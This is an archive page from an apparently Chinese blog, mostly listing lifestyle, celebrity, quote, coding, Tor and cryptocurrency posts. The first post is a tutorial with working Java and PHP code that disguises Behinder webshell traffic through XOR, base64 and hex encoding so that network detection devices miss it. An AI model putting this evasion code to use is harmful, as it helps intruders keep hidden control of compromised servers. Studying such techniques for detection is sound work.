网站首页 发表在 2023年01月 的所有文章

  • 冰蝎流量免杀初探

    0x01 前言 冰蝎4.0发布以后,可以自定义传输协议了,也就是我们能对流量进行改造,本文依据rebeyond大佬文章对冰蝎流量进行改造,记录一下踩过的坑。 https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A 冰蝎传输协议模块 分为本地和远程,其中本地模块只能用java进行编写,远程模块根据webshell的语言类型进行编写,比如java、php、asp,全部编写好后要生成服务端,也就是生成我们自己的webshell,用生成后的webshell进行连接。 借用大佬的图说明一下加解密流程 整体流量加解密流程为先对payload进行base64,再转成十六进制,具体函数往下看。 0x02 加解密过程 1、本地加密函数   private byte[] Encrypt(byte[] data) throws Exception{ //传入一个字节数组data,对data依据key进行按位异或 String key="e45e329feb5d925b"; for (int i = 0; i < data.length; i++) { data[i] = (byte) ((data[i]) ^ (key.getBytes()[i + 1 & 15])); } //先转换成base64,利用反射调用base64编码 byte[] encrypted = null; Class baseCls; try { baseCls=Class.forName("java.util.Base64"); Object Encoder=baseCls.getMethod("getEncoder", null).invoke(baseCls, null); encrypted= (byte[]) Encoder.getClass().getMethod( "encode", new Class[]{byte[].class}).invoke(Encoder, new Object[]{data}); } catch (Throwable error) { baseCls=Class.forName("sun.misc.BASE64Encoder"); Object Encoder=baseCls.newInstance(); String result=(String) Encoder.getClass().getMethod( "encode",new Class[]{byte[].class}).invoke(Encoder, new Object[]{data}); result=result.replace("n", "").replace("r", ""); encrypted=result.getBytes(); } //再改写成hex,利用DatatypeConverter类的printHexBinary()方法进行转换 Object obj = null; try{ Class clazz = Class.forName("javax.xml.bind.DatatypeConverter"); /* 这里返回了一个Object类型,虽然encrypted定义的是字节数组, 但是这里传进去的时候不知道为什么报的是Object,所以定义一个Object来接收。 这里用printHexBinary()把base64字符串转成16进制字符串, printHexBinary()接收一个byte数组, printHexBinary()是一个静态方法,invoke第一个参数可以传入null, */ obj = clazz.getDeclaredMethod("printHexBinary",new Class[]{byte[].class}).invoke(null,encrypted); }catch (Throwable error){ System.out.println(error); } //因为要求返回字节数组,所以这里先把Object转成字符串,再转成字节数组,好像不能直接由object转byte byte[] encrypted_hex = obj.toString().toLowerCase().getBytes(); return encrypted_hex; }   2、本地解密函数   private byte[] Decrypt(byte[] data) throws Exception { //从十六进制转回base64 String decrypted_hex = new String(data); byte[] decrypted_base = null; try{ Class clazz = Class.forName("javax.xml.bind.DatatypeConverter"); /* 这里用parseHexBinary()把16进制字符串转回base64字符串 parseHexBinary()接收16进制字符串,转回正常字符串 parseHexBinary()是静态方法,invoke第一个参数可以为空 */ decrypted_base = (byte[])clazz.getDeclaredMethod("parseHexBinary",String.class).invoke(null,decrypted_hex); }catch (Throwable error){ System.out.println(error); } //从base64转回正常字符串 byte[] decodebs; Class baseCls ; try{ baseCls=Class.forName("java.util.Base64"); Object Decoder=baseCls.getMethod("getDecoder", null).invoke(baseCls, null); decodebs=(byte[]) Decoder.getClass().getMethod("decode", new Class[]{byte[].class}).invoke(Decoder, new Object[]{decrypted_base}); } catch (Throwable e) { baseCls = Class.forName("sun.misc.BASE64Decoder"); Object Decoder=baseCls.newInstance(); decodebs=(byte[]) Decoder.getClass().getMethod("decodeBuffer",new Class[]{String.class}).invoke(Decoder, new Object[]{new String(decrypted_base)}); } String key="e45e329feb5d925b"; for (int i = 0; i < decodebs.length; i++) { decodebs[i] = (byte) ((decodebs[i]) ^ (key.getBytes()[i + 1 & 15])); } return decodebs; }   可以先看一下本地加密的效果 至此,本地加解密函数完成,下一步我们研究webshell怎么写。因为本文研究流量免杀,webshell的免杀在此处不做讨论。 3、远程加密函数   function Encrypt($data){ $key="e45e329feb5d925b"; for($i=0;$i<strlen($data);$i++) { $data[$i] = $data[$i]^$key[$i+1&15]; } $bs="base64_"."encode"; $after=$bs($data.""); return bin2hex($after);//base64后转16进制}   4、远程解密函数   function Decrypt($data){ $key="e45e329feb5d925b"; $bs="base64_"."decode"; $after=$bs(pack('H*',$data)."");//先解出16进制,再base64解码 for($i=0;$i<strlen($after);$i++) { $after[$i] = $after[$i]^$key[$i+1&15]; } return $after;}   0x03 效果 先生成服务端,生成我们自己的webshell 连接webshell 用burp抓包看一下流量 0x04 总结 本次加解密流程为先base64,再转成16进制字符串。先转成base64主要是为了保护原始payload,以免在从十六进制转回原payload的过程中发生递归解析,将原payload中的十六进制字符串也一并解析了。 本文仅针对冰蝎流量改造进行初步探讨,熟悉一下整个流程,真的要绕流量设备,估计还需要其他的技巧。...

    2023-01-06 341
  • 谨言. 性感丰满美女,2023心想事成!福利短视频

    谨言. 性感丰满美女,2023心想事成!福利短视频 ...

    2023-01-06 334
  • emlog程序开源资源网模板

    <p><a href="https://www.qqhjy.com/content/uploadfile/202301/d2b51672917917.png" target="_blank" rel="noopener"><img src="https://www.qqhjy.com/content/uploadfile/202301/d2b51672917917.png" alt="image.png"></a></p> 先运行模板目录下文件初始化域名/content/templates/weike/update.php然后首页下面会有一个小分区报错只需在模板设置的人气排行右侧专区那里填个分类id即可模板不依赖模板设置插件。 下载地址: 点击下载...

    2023-01-06 279
  • 渐变3D旋转的个人导航主页源码分享

    渐变3D旋转的个人导航主页源码分享 演示图: 图是别人的演示站截的,推广名称等源码已修改 蓝奏云 https://xl6x.lanzout.com/ib3Pg0k720uf ...

    2023-01-06 262
  • 搜狗搜索免费官网认证方法

    今天闲来无事,登陆各大搜索引擎站长平台,突然发现搜狗站长平台可以免费做官网认证了。虽然这个功能是2013年推出的,但我认为还是有必要和大家分享一下。提交方法也很简单,注册并登陆搜索站长平台→官网认证→添加认证认证的条件也很简单:(1)必须企业网站备案(2)符合国家法律法规,没有列入失信人名单(3)准备好企业营业执照 个人身份证即可. ...

    2023-01-06 263
  • 如何判断一个女人喜不喜欢你?就看这四点!

    /1/ 《十宗最》里面有这么一段话:我们无法叫醒一个装睡的人,也无法挽留一个要走之人。 是啊,就如同大家所说那样,在两性交往过程之中,男性朋友喜欢女性朋友,追求女性朋友是一件特别正常的事情,但是好的爱情应该是双向奔赴的,就像你们在机场永远等不到一艘船,也永远没有办法叫醒一个装睡的人,所以男性朋友同样也没有办法追求一个不喜欢自己,对自己完全不来电的人,说白了毫无异于就是给自己找不痛快。 因此大部分男性朋友即使是喜欢上某一个女性朋友,想要追求对方,想要跟对方在一起,在跟对方相处的时候都会先去观察女人喜欢不喜欢自己,对自己有没有好感,对自己感不感兴趣,假如说女人是喜欢男人的,是对男人感兴趣,是对男人有感觉的,那么这个时候男人再主动去追求对方,常常都可以事半功倍。 要知道在这个世界上,不管任何感情都是有迹可循,尤其是当一个女人喜欢男人,对男人有意思的时候,或者正在心里面偷偷暗恋男人,对男人感兴趣的时候,即使嘴巴上面不会直接讲出来,然而行为上面总是难以掩饰,一般来来讲,每当女人喜欢男人,对男人“芳心暗许”的时候,是会释放以下这些信号,如果男人收到一个,那就一定要好好把握住机会,千万不要傻傻错过了。 提醒各位男性朋友们,如何判断一个女人喜欢不喜欢你?就看这四点! ...

    2023-01-06 280
  • 冬天别再露脚踝了!“黑丝+白袜”的网红式穿搭,显腿长还很时髦

    对于女生来说,她们在穿搭时会把主要精力花在“怎么穿显瘦”上,因此即便是大冬天也要“露脚踝”,强调身材比例,显高又显瘦。但是,冬天“露脚踝”增加腿部留白,不够保暖还显得很突兀,还有什么穿搭方式能够在显瘦塑形的基础上,保暖又时髦呢? ...

    2023-01-06 341
  • 陈浩民老婆一如既往地狠!穿露脐背心零下20度滑雪,简直堪称牛人

    12月31日,演员陈浩民的老婆蒋丽莎在个人社交平台发布了一段视频,视频中蒋丽莎在零下20度在新疆滑雪。 ...

    2023-01-06 377
  • 女子回应在试衣间被男童掀帘:对方骂我看着就不正经不检点,是从事某种职业的动物,其丈夫还煽风点火

    1月4日,河南信阳,一女子在试衣间被男童掀帘事件持续引发关注。女当事人回应称,对方家长撒谎,孩子看着不止2岁,其中一位女子老公还煽风点火激化矛盾,对方家长还骂自己是从事某种职业的动物,看着就不正经、不检点。 ...

    2023-01-06 337
  • 微信朋友圈个性签名大全

    一、微信朋友圈个性签名大全 微信个性签名大全如下: 1、不为做过的事而懊悔。我只是遗憾,有些事,有机会却没有去做。 2、不要轻易把伤口揭开给别人看,因为别人看的是热闹,而痛的却是自己。 3、不要让我在乎你,你让我在乎了你,你就必须在乎我。 4、不要想着自己曾给人恩惠,因为除了你没人会记得。 5、成熟的最大好处是:以前得不到的,现在不想要了。 6、除了真心,我什么都给不了,可是你偏偏不要。 7、匆匆一个错身就错失了今生。 8、从前那些时光我称它为最好的时光。 9、从未曾离开那方沉默压抑的天空。 10、大多数不开心的人,往往低估了自己所拥有的,又高估了别人所拥有的。 11、大风起兮云飞扬,一生挚爱阿迪王。 12、带着刺猬做气垫船,你真坏得有创意。 13、当别人开始说你是疯子的时候,你离成功就不远了。 14、当路边的微笑都变成往事你会在哪里。 15、当你不爱一个人的时候不要假装关心他,那样你只会更加伤害他。 16、当你真的在乎一个人,多么微不足道的小细节,也变得重要起来。 17、当情歌老了当我不再爱你了。 18、当我给不起的时候,我所能做的,只有离开。 19、当我想要好好爱你的时候、你却已经不在身边了。 20、当我笑着说我很好的时候,我是真的想,我能过得好。 二、qq个性签名,写点什么好! 1、世上没有十全十美的文章,如同世上没有彻头彻尾的绝望。 2、如果你不是经常遇到挫折,这表明你做的事情没有很大的创新性。 3、沉默是诽谤最好_答复。 4、想要过得好就得放下曾经。 5、人的一生中总会有很多遗憾?? 6、时钟可以指向原点,只是已不再是昨天。 7、成功不在难易,而在于是否采取行动。 8、人对清澈见底的东西往往不再尊重与欣赏,而只会对冰山上的一粒尘埃表示遗憾。 9、一个成功的男人背后都有一个聪明的女人帮他出谋划策。 10、受思深处宜先退,得意浓时便可休。 11、把你的脸迎向阳光,你就不会看到阴影。 12、有的人闹着闹着就近了,有的人笑着笑着就远了。 三、qq个性签名霸气,有气质 1、王者不是天天有,低调才能永不朽! 2、做好自己就够了,不要在乎别人怎么说。 3、树无皮,必死无疑!人无脸,天下无敌!就是说你! 4、这个世界上任何东西都会被时间涂抹更改,但,有你在,我便也在。 5、要么干了这碗鸡汤,以后安心疗伤;要么干了这碗毒酒,从此万物刍狗。 6、活得长并不见得活得好,活得好就是活得足够长。 7、全世界的人都离开你了我也会在你身边,有地狱我们一起猖獗。 微信朋友圈个性签名大全-第1张图片-2484 8、变了心的爱人,就像狗,谁有本事谁牵走。 9、听着,若谁折我姐妹翅膀,我定废其整个天堂。 10、好男人要做虎,只叩苍天拜父母! 11、如果你开始想念我,记住了,不是我自己要走,是你自己松手。 12、爱情是什么,爱情不是色戒就是钻戒。 13、不必仰望别人,自己也是风景。 14、兄弟赐我辉煌,我比天更猖狂。 四、怎么起QQ签名? QQ签名对我来说就是心情的写照。  心情好的时候,就写一些好心情的签名如,一直爱你,爱你一万年 2心情不好的时候,就写一些消极的 当想一个人的时候当然就是情谊绵绵了 在恨得时候就是恶狠狠的 签名要会吸引人,不能说一盖而论 五、骚一点的QQ个性签名 护舒宝的骚,性感不是骚,没有人不骚,看你骚不骚,除非你很骚,不然就是骚。 我的欲望你能懂 我的身体给你碰 只有你能让我如此冲动 ck的歌的歌词 1、魔鬼般惹火的身材,一头大波浪形金黄卷发发出耀眼的光芒,修长的大腿穿着一条鹅黄色的超短迷你裙,显出身材的完美绝伦。 2、眼前这少女除了服饰相异之外,脸型,眼睛,鼻子,嘴唇,耳朵,肤色,身材,手足,竟然没一处不像,宛然便是那玉像复活,一双眼只是瞧着她淡淡的眉毛这么一轩,红红的嘴唇这么一撅。 3、如描似削身材,怯雨羞云情意。举措多娇媚。最是那回眸一笑,万般风情绕眉梢。 4、鬓珠作衬,乃具双目如星复作月,脂窗粉塌能鉴人。略有妖意,未见媚态,妩然一段风姿,谈笑间,唯少世间礼态。断绝代风华无处觅,唯纤风投影落如尘。眉心天生携来的花痣,傲似冬寒的独梅。 5、多少红颜悴,多少相思碎,唯留血染墨香哭乱冢。 6、苍茫大地一剑尽挽破,何处繁华笙歌落。斜倚云端千壶掩寂寞,纵使他人空笑我。 7、任他凡事清浊,为你一笑间轮回甘堕。 8、寄君一曲,不问曲终人聚散。 9、谁将烟焚散,散了纵横的牵绊。 10、听弦断,断那三千痴缠。坠花湮,湮没一朝风涟。花若怜,落在谁的指尖。 ...

    2023-01-06 412
  • 祝自己越来越好的励志文案 祝自己事业越来越好的说说

    1.阳光穿透云层;春天的气息,冰下创业的希望,在你奋斗的脚步声中出现!祝你成功成就! 2.成功的人有非凡的自信。换句话说,他们相信自己,相信自己漂亮,相信自己很好,并且无论如何都比别人好! 3.友谊建立!爱被维护!痛是倾诉!过去只是回忆!而你属于我,我在你心里! 4.梅花香来自苦寒,刀锋来自磨砺。你会成功的!竞争总是有风险的。如果你敢于承担风险和责任,你就能在竞争中获胜。 5.德性佳,业绩棒,众望所归恭祝:实至名归理应当!常表率,勤躬行,心悦诚服恭贺:圆满收官顺自然! 6.诚挚邀请海内外客商,真诚架起一座桥梁,让我们在互利的道路上来来去去自如,携手同行,走向四面八方。 7.高山上的人总是比平原上的人先看到日出。如果你有远见,你的事业必定会有辉煌的未来。我祝你有一个美好的未来! 8.新的一年象征着新的进步、新的成功、新的希望。新年伊始,希望我们能在新的一年里更好地合作。 9.祝你运顺,好事美事皆成双,幸福美满福运淌。 10.让家乡变的更美,是一种品味;让地球变的更美,是一种品德;节能减排低碳生活,美化地球改变华夏。低碳生活,我们携手倡导,由我做起。 11.天幕徐徐拉开,清风袅袅吹来,问候轻轻送来,一身轻松自在,登上事业舞台,开创美好未来,幸福花儿盛开,愿你天天愉快! 12.早上迎着晨曦,晚上披着晚霞,在林立的高楼穿梭,两点一线的忙着生活,职场辛苦,难免疲惫,偶尔歇歇脚,散散心,平安是福,健康才好。 13.你,升了职,涨了薪,发了财,美了心;我,许了愿,发了信,讲了话,送了福;愿你升职快乐,事业节节升,生活步步高! 14.坚持理想,努力追求;跌倒站起,永不回头;面对失败,绝不退后;坚守成功,再加把油;有此毅力,迟早成功,伴你左右;逍遥人生,最终拥有! 15.回南天,雾气重,冲破潮湿,我把祝福送,愿您冲云破雾生活蒸蒸日上,腾云驾雾事业步步高升,云开雾散心情快乐无忧,一切烦恼雾散云消顺心如意! 16.又是上班时间到,短信送你我的关怀:送你如意,把烦恼打败;送你快乐,把忧伤击倒;送你轻松,把忙碌扫除;送你吉祥,把工作早完结。祝你工作如意,心情愉快! 17.理想是帆,有坚定健康的理想,必定也会有耐晒抗雨的帆,海风偶尔会让帆动摇不定,但只要心在跳心在思,总能迎风起帆,到达心中的彼岸。 18.问路才不会迷路,留退路才不会有绝路,敢回头就没有死路。失去了不一定是失败,成功了也不一定是成就,可以逃避现实,但不能逃避人生。 19.不要流泪,不要伤悲,不要颓废,不要自卑,振作起来,美好未来充满光辉!看我给了你安慰,还不快请我喝一杯,不然你就是窝囊废!哈哈,祝你事业有成,振翅高飞! 20.你不想安逸自在,你承担着繁重的负担,在别人望而却步的地方自己创业。我真诚地祝你成功! 21.清风对你非同凡响,别让无情的太阳晒你。奔放的阳光和健康的你在这里。 22.天天祝福你,好东西追你,幸福盯着你,病离你而去,痛苦离你远去,幸福跟着你,一切都跟着你,成功属于你! 23.新店开张送祝福,送对联表情。上联:生意兴隆,财如海;夏联:客如流,钱如潮。横批:生意好。 24.名店名扬天下;迎宾楼房间爆满。厨房下新鲜烹制,每个庭院都会举办中式宴会;酒置于庙中,仙子饮瓶醉寒。 25.如果我们失去了我们的马匹,我们会很高兴,或者上帝会为你打开一扇窗,为你关上一扇门。赢家坚信他们可以改变局面。 26.真正在努力的,日子是不会舒服的。把自己变优秀,其他的事情自然就会跟着好起来,会讲究,能将就,能享受最好的,也能承受最坏的。亲们早安! 27.搜集每一次的真诚,让我们感受合作的愉快;寻找每一份的真情,让我们携手共创未来;送上每一天的问候,愿您事业一帆风顺。 28.人生有时候事业无成,就像河流没有融入大海,这是力量不够,或者没有找对方向。如果你把点点滴滴积涓成流,总有一天会浩浩荡荡,惊涛拍岸的。 29.把弯路走直的人是聪明的,因为找到了捷径;把直路走弯的人是豁达的,因为可以多看几道风景;路不在脚下,路在心里。早安,愿好! ...

    2023-01-06 397
  • 2022天猫年货节来啦!每天抽红包!

    12点整淘宝红包专属加码来袭,必中4元红包,拼手速共10万份!抽到的红包可以无门槛使用,叠加各种大促优惠,积少成多,直接抵现!坚持每天抽,也就几秒的事情!活动地址:https://m.tb.cn/h.U9dWh4m(淘口令:¥1w5pd4ZEZIs¥)活动时间:2022.12.27-2023.01.10 ...

    2023-01-06 274
  • vue实现打印及导出

    安装命令: npm i vue-to-pdf --save npm i vue-easy-printer --save 绑定事件 <div id="exportPdf" ref="exportPdf"> </div> <input type="button" @click="printPdf">打印</input> <input type="button" @click="savePdf" >导出(pdf)</input> savePdf(){ this.$PDFSave(this.$refs.exportPdf, "我的文件"); }, printPdf(){ this.$easyPrint(\'exportPdf\',"我的文件",\'portrait\'); } 另外一个打印安装 npm install vue-print-nb --save 全局注册 import Print from 'vue-print-nb' Vue.use(Print); 使用 用v-print指定需要打印的div容器,本次叫printTest。最好使用行内样式,使用组件库部分样式可能不能生成。 <div id="printTest" > <p>锄禾日当午</p>       <p>汗滴禾下土 </p>       <p>谁知盘中餐</p>       <p>粒粒皆辛苦</p>     </div>     <button v-print="'#printTest'">打印</button> 不打印区域 <div class="no-print">不要打印我</div>  ...

    2023-01-06 328
  • 什么是Tor?Tor浏览器更新有什么用?

    前言:近期Tor项目团队近日宣布,发布Tor浏览器11.5版本。Tor被美国国家安全局(NSA)誉为“互联网匿名系统之王“。Tor ( The Onion Router)系统就是洋葱路由技术的具体实现。 近期Tor项目团队近日宣布,发布Tor浏览器11.5版本,而此次更新1.帮助用户自动绕过互联网审查2.HTTPS 默认开启3.对网络设置菜单进行了重大改进。说起TOR浏览器都略有耳闻,那么Tor是什么样的技术原理?到底要如何应用? 什么是Tor 如今互联网已经是我们最常用的交流平台,一切痕迹在互联网上都有迹可循。为了掩饰上网时的个人信息与身份,保护个人隐私和安全,各种网络匿名冲浪技术应运而生,而洋葱路由(Onion Routing)技术和Tor ( The OnionRouter)系统则在它们当中脱颖而出,并被美国国家安全局(NSA)誉为“互联网匿名系统之王“。 要知道,电脑能够上网是以互联网编号分配机构(IANA,Internet Assigned Numbers Authority)分配的IP地址为前提,互联网的IP数据包由包头和数据载荷组成。数据载荷可经加密以防被第三方窥视,但包头包含发送方和接收方的IP地址、数据载荷长度、发送时间等信息,如果网站手动攻击用户的上网地点、访问网站、身份背景以及通联关系可能会被盗取。 洋葱路由( Onion Routing)技术综合运用了随机多跳路由、多层封包、多重加密等技术手段,可以实现可靠的在线匿名。1996年Reed,M.G.P.F. Syverson,和D. M. Goldschlag提出的匿名通信算法,基本原理等同于Chaum,D. L.的 Mix 匿名通信算法,随后由美国海军提出的和孵化的,它的初衷是保护政府通信以及为情报界和军队的网络活动提供匿名掩护和身份保护。 洋葱头路由的目的是为基于TCP的应用提供低延迟的匿名通信服务,如web访问,即时通信等。洋葱头路由算法基于通道(Circuit)实现数据报文的路由和传输。算法在网络中通过若干个节点建立通道,通过通道传输后续的用户数据。 Tor ( The Onion Router)系统就是洋葱路由技术的具体实现。Tor Project公司开发的Tor软件—Tor Project、一些大学和机构提供的一组核心Tor路由器与全球志愿者提供的数以千计的Tor路由器,共同组成了一个免费、开源的互联网匿名系统—Tor。Tor目前以参与者志愿提供中继节点的方式广泛地部署在Internet 中,是Internet中最成功的公共匿名通信服务。 Tor的设计引入完美的前向机密(perfectforwarsecrecy、拥塞控制(congestiopcontro)、口亟服务(directory service)、完整性校验(gintesrity checking)。可配置的出口策略(configurable exit policies)和端到端完整性校验等机制,解决了第一代洋葱头路由匿名通信系统设计的种种问题。 Tor有两种实体,分别是Tor用户(Tor user)和Tor节点(Tor node)。Tor节点提供中继服务,是Tor 网络的主体。Tor用户在系统中运行本地代理Onion Proxy (OP)程序,该程序选择中继节点,通过中继节点建立通道,接收应用TCP数据流,并将该数据流通过已建立通道传输。 每个Tor 节点都具有一组身份秘钥(identitykey)和-一组洋葱头秘钥(onion key)。身份秘钥用来签署Tor 节点的路由描述符。路由描述符是一个集合,包括该节点的洋葱头秘钥、地址、带宽、出口机制等,注册在目录服务中。洋葱头秘钥用来建立传输通道以及协商传输的会话秘钥。   二、Tor应用的双面性 任何技术都是双面性的,Tor提供了保护用户隐私的匿名通信服务。通过Tor网络传输的用户通信,既有合理合法的用户行为,也有滥用的行为。由于Tor网络的机制是出口节点代表用户访问最终的目的服务,因此当出现滥用行为时,目的服务看到的是出口节点发起的恶意行为,其直接结果往往是目的服务阻止出口节点访问,从而使所有通过该出口节点访问同样目的服务的通信都被阻止。 Tor网络中部分传输流量的内容为不安全的应用协议,如Telnet、POP3 等。因此部分恶意Tor节点,当其作为传输通道的出口节点时,则运行相应的记录程序,对传输的敏感数据进行记录。如记录的Telnet或 POP3协议中密码传输的用户名和口令,并用作商业的用途,出售给相关的公司和机构。现在国内一些科技公司开发了检测IP代理的软件,用来检测Tor连接,防止欺诈、加强流量过滤、避免虚假账号注册等问题。   三、关于Tor浏览器11.5版本 本次Tor的更新是关于三大方面: 1.自动绕过互联网审查(Auto block bypassing)   2.HTTPS 默认开启(HTTPS on by default) 版本11.5 中的另一个重要新功能是将“HTTPS 模式”设为默认浏览模式,以便通过隧道进行连接。这确保了用户和托管网站的服务器之间的所有数据交换都将被加密,以防御中间人 (MitM) 攻击并保护用户免受恶意出口中继的 SSL剥离。 网络设置菜单更改为“连接设置“(Better settings) Tor 浏览器 11.5 的第三个重大改进是对网络设置菜单进行了重大改进,现在称为“连接设置”,它应该更容易找到和理解特定设置。最值得注意的是,桥接配置和连接选项已经过重新设计,以实现快速轻松的审查和管理。 在保存的桥上使用表情符号,新界面首次提供了配置的可视化,便于识别正确的桥并在需要时方面快捷的选择它。 如今TORDE 的用户数已经超过十万,如军事、情报机构、记者等以及超过75个国家的6011个继电器提供在线匿名和隐私保护。...

    2023-01-04 1346
  • 2022年度币圈年度回顾

    2022年度对于加密货币行业来说是极不平凡的一年,在这不平凡的一年里,加密领域从年初近3万亿市值顶峰一路下行,在俄乌冲突、全球通胀、疫情持续蔓延的背景下,持续阴跌,这个过程没有像样的反弹,先后经历了Terra崩盘、三箭暴雷、FTX破产等多起影响深远的黑天鹅事件,加密货币市场价值暴跌,比特币一度跌破15500美元,加密货币行业再次经受重大考验。加密货币行业跟其他投资行业一样,历来是牛短熊长,虽然整个行业大幅缩水,比特币也跌破了上一周期的高点,但熊市恐怕还没有这么快结束,唯一的好消息是我们终于又熬过了一年熊市,离下一轮牛市又近了一点,在此,带你一起来回顾2022年度机密货币领域的五大事件 Top5 黑客攻击romin网络窃取6.23亿美元Ronin 是热门NFT游戏Axie Infinity的底层区块链,Ronin 和Axie Infinity运营商 Sky Mavis3月23日早上在一篇博客文章,宣布遭遇黑客攻击,黑客利用该网络洗劫了大约 6.25 亿美元(173,600 枚以太坊和 2550 万USDC)。这一数字超过了 2021 年 8 月 DeFi 协议 Poly Network 遭受的 6.11 亿美元黑客攻击 根据 Sky Mavis 的说法,Ronin 之所以遭受攻击,部分原因是该公司在去年 11 月走捷径来缓解网络“巨大的用户负载”,网络游戏在去年1月之后人气激增,,非常受菲律宾和其他国家的玩家的欢迎,甚至依靠它作为一个全职工作。该系统于去年12月停止使用,但允许它使用的权限从未被撤销。除了攻击Sky Mavis自己的四个节点外,攻击者还利用这些节点访问其拥有的Axie DAO管理的一个节点。在破坏九个验证器节点中的五个后,攻击者可以威胁任何交易安全性,并提取任何他们想要的资金。Sky Mavis表示,他们将把交易所需的节点数量增加到8个,一旦确定没有更多资金可用Top4  terra崩盘在其鼎盛时期,Terra是世界上市值最大的加密货币之一。由于原生稳定币UST的成功,Terra在2021年底到2022年初生态异常繁荣。与大多数稳定币相反,UST依靠算法机制来保持与美元的锚定。该系统让用户通过燃烧等量的Terra的波动性LUNA币来铸造新的UST代币,或者用UST赎回新的LUNA币。LUNA 生态系统和稳定机制的关键是 Anchor,它将很多 UST 存入其中以获得高额收益。在其巅峰时期,Anchor 持有流通中所有 UST 的近 75%——这使得 UST 的价值高度依靠于 Anchor 的运作。在高峰期,Terra生态系统的价值超过400亿美元2022 年 5 月,价值 20 亿USD的 UST 从 Anchor 协议中撤出并清算。这给 LUNA 带来了重压,由于套利者试图借助价格差异,从而扩大了 LUNA 和 UST 之间的差距,而 UST 本来就不应该变得这样之大。Luna 基金会试图通过向系统中注入更多的 UST 来弥补这一差距(记住 UST 在 LUNA 被铸造时被销毁),试图重新控制并平衡两种数字货币的价格。但Terra的算法推动LUNA大量增发,LUNA & UST因此进入死亡螺旋,最后导致崩盘。币luna价格从4月的119美元跌至0.0001972美元,接近归零,一系列连锁反应由此开始。Top3 Celsius、3AC引发加密连锁地震Terra在5月爆暴雷,让投资者损失数百亿美元,引起多地政府监管。而到6月中旬,Do Kwon的 "劳动 "成果已经进入集中式零售加密货币市场,影响愈发恶化。6月12日晚,Celsius提醒其客户,它正在暂时但无限期地搁置提款。Celsius投资Terra公司,随着其投资变得资不抵债,连锁反应频出。Celsius借款和贷款大多发生在少数公司的封闭网络中,其在Maker、Compound和Aave等去中心化平台上贷款,但也向Genesis、Galaxy Digital和Three Arrows Capital等中心化实体大量贷款。在Celsius宣布的几天内,关于3AC破产的传言开始流传,指三箭资本面临流动性问题,也有消息指该公司疑似挪用客户资金。此后,数字资产经纪公司Voyager Digital表示,已经向三箭资本出借15,250个比特币和3.5亿美元的稳定币USDC。按当时的价格计算,贷款总额超过6.75亿美元。Voyager Digital公司要求三箭资本在6月27日前偿还全部未结清贷款,否则将面临违约。事情曝光后, 其他三箭资本的借贷人纷纷要求三箭资本偿还贷款, 包括Genesis Global Trading BlockFi,BitMex,FTX,及Blockchain等等。三箭资本被迫出售其资产,更一度在curve上的stETH/ETH池大幅抛售8万枚stETH (超过 8400 万美元), 导致stETH脱锚 (stETH曾经一脱锚到0.94ETH)。Top2  Ftx暴雷11月2日,加密货币新闻网站CoinDesk披露了由SBF先后创立的对冲基金Alameda Research及FTX交易平台之间的关系,在Alameda的资产负债表上有146亿美元,FTT为其最大单一资产,约持有1.4亿枚,价值58亿美元,占其净资产的 88%,同时1.4亿枚占FTT两亿枚流通量的70%,消息一出瞬间引爆币圈。11月6日,与FTX有千丝万缕关系的币安创始人赵长鹏表示,担心FTT会发生像Luna那样瞬间崩溃的状况,未来几个月内将要抛售超2300万枚FTT,SBF和赵长鹏的大战开启,拉开了FTX崩盘的序幕。SBF看到赵长鹏抛售FTT,表示立即花22美元/币的价格购买币安所有要抛售的FTT,FTX和币安的大战进入白热化状态。币安和FTX作为加密货币交易平台的前三,已形成大而不倒的态势。某硅谷分析师认为,赵长鹏和SBF已成为加密圈非常重要的领军人物,无论如何争吵,只有永远的利益,相信加密行业仍将在各方共同利益驱动下继续前行。殊不知,FTX正在成为下一个LUNA。随着Alameda资产负债表的爆出,引发投资者对Alameda和FTX可能遭遇流动性危机的担忧。加上赵长鹏率先抛售FTT,恐慌情绪开始蔓延,认为SBF资不抵债。CoinDesk的报道称,FTX成立目的是为了给Alameda大量筹集资金,Alameda通过低价买入FTT,通过营销将FTT价格推高,接着再以高价FTT作为抵押,向FTX客户们贷款,用高杠杆成倍扩大自己交易利润。在高杠杆及币圈巨大的波动下,SBF的巨大泡沫早有破产预兆。当人们意识到FTX会成为下一个LUNA时,开始纷纷从FTX中提取资金,FTX遭遇约60亿美元的挤兑。紧接着,FTX关闭了以太坊等主流货币的区块链转账,FTX面临了史无前例的危机。赵长鹏作为FTX危机的导火索,将SBF推向绝境。面对岌岌可危的FTX,币安成了SBF的救命稻草。SBF寻求赵长鹏的收购,赵长鹏确认与币安签定了无约束力的意向书,有意收购FTX。11月9日,赵长鹏在推特上表示:FTX向我们求助,他们存在大量的流动性挤兑,为保护用户,币安有意全面收购FTX,帮助化解流动性危机,币安将在未来几天内进行尽职调查。一天后,币安表示尽职调查显示FTX陷入流动性危机,FTX的债务和资产之间的差距可能超过60亿美元,且面临监管部门调查,币安决定放弃收购FTX。随即FTT开启暴跌模式,价格暴跌90%。比特币也跌破16000美元,创2020年11月以来的最低点。面对资不抵债的尴尬境地,FTX宣布在美国申请破产,FTX表示有超10万名债权人,资产和负债在100亿至500亿美元量级。FTX上演了Celsius的悲剧,FTX的储户将陷入“OFO小黄车”漫长的提款等待期。FTX的崩盘可谓是币圈的“雷曼危机”,引爆比LUNA陷入“死亡漩涡”更危险的币圈地震Top1 以太坊完成 "合并"尽管坏事频频,但以太坊给加密领域带来了希望曙光,2022年9月15日,以太坊合并顺利完成,标志着以太坊主网的共识机制正式从工作量证明(PoW)过渡至权益证明(PoS)。作为龙头基础设施,以太坊自诞生起便一直使用工作量证明共识机制来保证系统的安全,各种交易、智能合约、账户等复杂功能也都是运行在这一核心机制之上。随着以太坊上生态应用的不断繁荣,当前的基础架构对系统扩展性提出挑战,PoW的局限性严重限制了以太坊的未来发展。为解决可扩展性问题,团队给出了一系列网络升级方案,合并是该系列中的第二次网络升级。对合并的议论从夏天开始,促使市场从6月流动性危机后的绝望中稍稍解脱,而关于分叉的讨论也推动了加密关注热潮。ETH从6月的底部飙升超过100%,看好合并后--99.95%的能源效率提高和90%的ETH排放量削减--能够帮助加密货币逆风翻盘。对以太坊而言,转向PoS为以太坊后续的分片扩容奠定了基础。对行业来说,合并意味着大规模显卡挖矿时代结束,矿工将可能暂别加密主要历史舞台。随着以太坊性能优化,未来势必会挤压其它PoS公链生态。从更深层次的方面来说,合并是以太坊响应全球减少碳足迹号召的重要改变。但由于技术与生态的限制,这一更新的真正影响只有在未来几年才会显现。写在最后:作为熊市的典型,这些些标志性事件也是一些最具灾难性的事件,我